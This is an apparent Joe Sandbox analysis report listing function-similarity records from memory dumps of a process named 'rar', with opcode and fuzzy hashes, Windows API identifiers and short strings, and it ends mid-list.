                                                                                                                                                                                                                              • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                              • Instruction ID: 8c60fd6d17ef8d80984c62469d34be7fb4f331d9c50f0b9c1cd0e6b7c24c77d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A129E2AE0D5A385FB28DA5D90442B86696FB48764FCC4332D79EC36E0DF2DE691C305
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2092471728-0
                                                                                                                                                                                                                              • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                              • Instruction ID: 2a31fd158eaedfcd40b4760ff1498567ffa4125a20ba02da26ba3b7e0b2f551f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F51883261878686EB20CF19E44416A77B4FB99B94F500235EB9D83BE8DF3CE555CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                                              • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                              • Instruction ID: 9581bb66e227cacf2f2e903ba352a93f7bfdc0bb416d73c053c3257d9aa0bd1c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C5126B2B146558EEB58CFB8D4445AC37B1FB08B88B60413ADF0E96B68EF38D555CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                                              • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                              • Instruction ID: 1308b37c48b12b00fb61ad290d4c91ecb9d03de8f13a9e1bd2ced52c64f87d5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36313662B14A518EEB04CFB8D8901BD3770FF08B48B54552AEF0EA7A68EF38D495C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                              • API String ID: 0-13699710
                                                                                                                                                                                                                              • Opcode ID: 969fda4f40c314800319598d7d1b53e9821355c5f20c2078fec8c7b385f8f9f5
                                                                                                                                                                                                                              • Instruction ID: 7fc7fbfd2bd8504474140b25f10b243f2d76bfbfeaa054cf6f1df69d3f26b52f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 969fda4f40c314800319598d7d1b53e9821355c5f20c2078fec8c7b385f8f9f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32818421A186C385EA74DB69D41A2FD27A2FB89384F404131DB5D8BAEADF2DF605C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                                              • API String ID: 3913153233-629598281
                                                                                                                                                                                                                              • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                              • Instruction ID: 52c95058cb01aa9aabb46ecdc49671b5145a384809bb253792a91387449d4e2b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E619036E0964287EB1CDB29E454A793791FB4CB94F948638DF1A877A8DF7CE8418700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                              • String ID: $ACL
                                                                                                                                                                                                                              • API String ID: 2361174398-1852320022
                                                                                                                                                                                                                              • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                              • Instruction ID: c6dfac94ff5804725e1c4807196d371a1fb3b2bfe3b39fae5f74b6d9e29c28de
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0318061B09A8292EB24DB15E4543EA63B4FB9C784F804135EB8DC3BA6DF3CE615C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                                                                                                                                                                                              • String ID: CompareStringOrdinal$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 2522007465-2120454788
                                                                                                                                                                                                                              • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                              • Instruction ID: 0a17159d07235791297ee3961e8b4a8c71436c75a9a6df0b117d732f5ae5adaa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5621A121A0C68AC5EB24DF19E94817D72A0BF49B80F640636EF5DC76B5EF2CE5458300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                                                                              • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                                                                              • API String ID: 1364621626-1794493780
                                                                                                                                                                                                                              • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                              • Instruction ID: b68bf694828cd215b8d1f7f86a8cc411ab4dfcdfffb7e09d29e18466f897a05a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D21D076A186418AE760CF68E484A9D77F0F74C798F144136EF8893B58DF38E9458F10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                              • Instruction ID: ae23ed1b4be9d1b58c92dd822e68eebf1761b54f55a85681d0ba731d5482e309
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAF04921B19A8281EE4D8F19F4902792760BF8CB84F482639EB4FC6674DE3CD4848700
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                              • Instruction ID: 71c865f4d6fbcbc897415a1c038e6de6f15d4138a1c76557ca75fda6a37377ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6A10662B087A246EB698F6A90403B96691BF48BA4F8C4735DB5D8B7E5DFBCD444C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                              • Instruction ID: 7ae55618524fff980c028e33e7e038144e9e6d63866c34ce5e38e8749d8a6b50
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8981AEA6A1966285F7289B6D94806BD26A1BB4CB88F484335DF0E937B1DF3CA442C714
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
